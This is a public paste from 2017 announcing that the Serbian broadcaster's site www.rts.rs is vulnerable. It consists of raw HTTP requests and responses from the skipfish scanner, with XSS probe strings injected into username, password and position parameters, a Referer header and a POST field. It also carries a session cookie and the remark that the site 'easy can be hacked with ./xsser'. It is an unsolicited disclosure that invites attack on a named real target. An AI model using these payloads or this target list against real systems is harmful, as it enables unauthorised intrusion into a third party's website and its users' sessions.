API tools faq
paste
Advertisement
Guest User

rts.rs vulnerable

a guest
Feb 4th, 2017
126
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
GetText 1.93 KB | None | 0 0
raw download clone embed print report
  1. rts.rs vulnerable
  2. === REQUEST ===
  3. +XSS INSIDE BODY+easy can be hacked with ./xsser
  4. GET /page/rts/ci/javniservis/news/1940.html?username=.htaccess.aspx-->">'>'"<sfi002106v501469>&password=skipfish HTTP/1.1
  5. GET /page/rts/ci/javniservis/news/1940.html?username=Smith&password=.htaccess.aspx-->">'>'"<sfi002126v501469> HTTP/1.1
  6. GET /page/rts/ci/javniservis/news/1940?username=Smith-->">'>'"<sfi002180v501469>&password=skipfish HTTP/1.1
  7. GET /page/rts/ci/pesma%2Bevrovizije/junior/news/160/decja-pesma-evrovizije-2008.html?position=1&.htaccess.aspx-->">'>'"<sfi002256v501469> HTTP/1.1
  8. POST /page/rts/ci/pesma%2Bevrovizije/junior/news/160 HTTP/1.1
  9. Host: www.rts.rs
  10. Accept-Encoding: gzip
  11. Connection: keep-alive
  12. User-Agent: Mozilla/5.0 SF/2.10b
  13. Range: bytes=0-399999
  14. Referer: http://www.rts.rs/
  15. Referer: -->">'>'"<sfi002180v501469>
  16. Cookie: JSESSIONID=52E25D0DD8BAE6CFEA68F2D1B29A589D.tomcat2
  17. Content-Type: application/x-www-form-urlencoded
  18. Content-Length: 51
  19. websites2=.htaccess.aspx-->">'>'"<sfi002246v501469>
  20.  
  21. === RESPONSE ===
  22.  
  23. HTTP/1.1 200 OK
  24. Server: nginx/1.4.2
  25. Date: Sat, 04 Feb 2017 12:38:00 GMT
  26. Content-Type: text/html;charset=utf-8
  27. Transfer-Encoding: chunked
  28. Connection: keep-alive
  29. Content-Language: ci
  30. Expires: Sat, 04 Feb 2017 12:43:00 GMT
  31. Cache-Control: max-age=300
  32. X-Proxy-Cache: MISS
  33. Content-Encoding: gzip
  34. ---------------------------------------
  35. ---------------------------------------
  36. + cached set-cookie +
  37. === REQUEST ===
  38.  
  39. GET /sfi9876 HTTP/1.1
  40. Host: www.rts.rs
  41. Accept-Encoding: gzip
  42. Connection: keep-alive
  43. User-Agent: Mozilla/5.0 SF/2.10b
  44. Range: bytes=0-399999
  45. Referer: http://www.rts.rs/
  46. Cookie: JSESSIONID=52E25D0DD8BAE6CFEA68F2D1B29A589D.tomcat2
  47.  
  48.  
  49. === RESPONSE ===
  50.  
  51. HTTP/1.1 404 Not Found
  52. Server: nginx/1.4.2
  53. Date: Sat, 04 Feb 2017 10:58:18 GMT
  54. Content-Type: text/html
  55. Transfer-Encoding: chunked
  56. Connection: keep-alive
  57. Set-Cookie: JSESSIONID=64898379551C9A2002E48F448520CE9E.tomcat2; Path=/
  58. Content-Encoding: gzip
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!